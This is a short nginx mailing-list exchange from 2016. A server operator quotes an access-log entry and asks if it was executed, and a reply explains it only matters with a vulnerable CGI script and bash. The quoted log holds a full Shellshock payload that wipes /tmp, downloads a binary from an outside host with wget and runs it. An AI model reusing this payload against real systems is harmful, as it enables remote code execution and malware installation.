Not unless your / location passes the request to a vulnerable cgi-script using a vulnerable version of bash.
See https://en.wikipedia.org/wiki/Shellshock_(software_bug) On Sat, Jul 30, 2016 at 7:57 PM, li...@lazygranch.com <li...@lazygranch.com> wrote: > I see a return code of 200. Does that mean this script was executed? > ------------- > 219.153.48.45 - - [30/Jul/2016:07:40:07 +0000] "GET / HTTP/1.1" 200 643 > "() { :; }; /bin/bash -c \x22rm -rf /tmp/*;ech o wget > http://houmen.linux22.cn:123/houmen/linux223 -O /tmp/China.Z-slma > >> /tmp/Run.sh;echo echo By China.Z >> /tmp/R un.sh;echo chmod > >> 777 /tmp/China.Z-slma >> /tmp/Run.sh;echo /tmp/China.Z-slma > >> >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod > >> >> 777 /tmp/Run.sh;/tmp/Run.sh\x22" "() { :; }; /bin/bash -c \x22rm > >> >> -rf /tmp/*;echo wget http://houmen > .linux22.cn:123/houmen/linux223 -O /tmp/China.Z-slma > >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod > >> 777 /tmp/China.Z-slma >> /tmp/Run.sh;echo /tmp/China.Z-slma > >> >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 7 > 77 /tmp/Run.sh;/tmp/Run.sh\x22" > ------------------------- > > _______________________________________________ > nginx mailing list > nginx@nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx >
_______________________________________________ nginx mailing list nginx@nginx.org http://mailman.nginx.org/mailman/listinfo/nginx
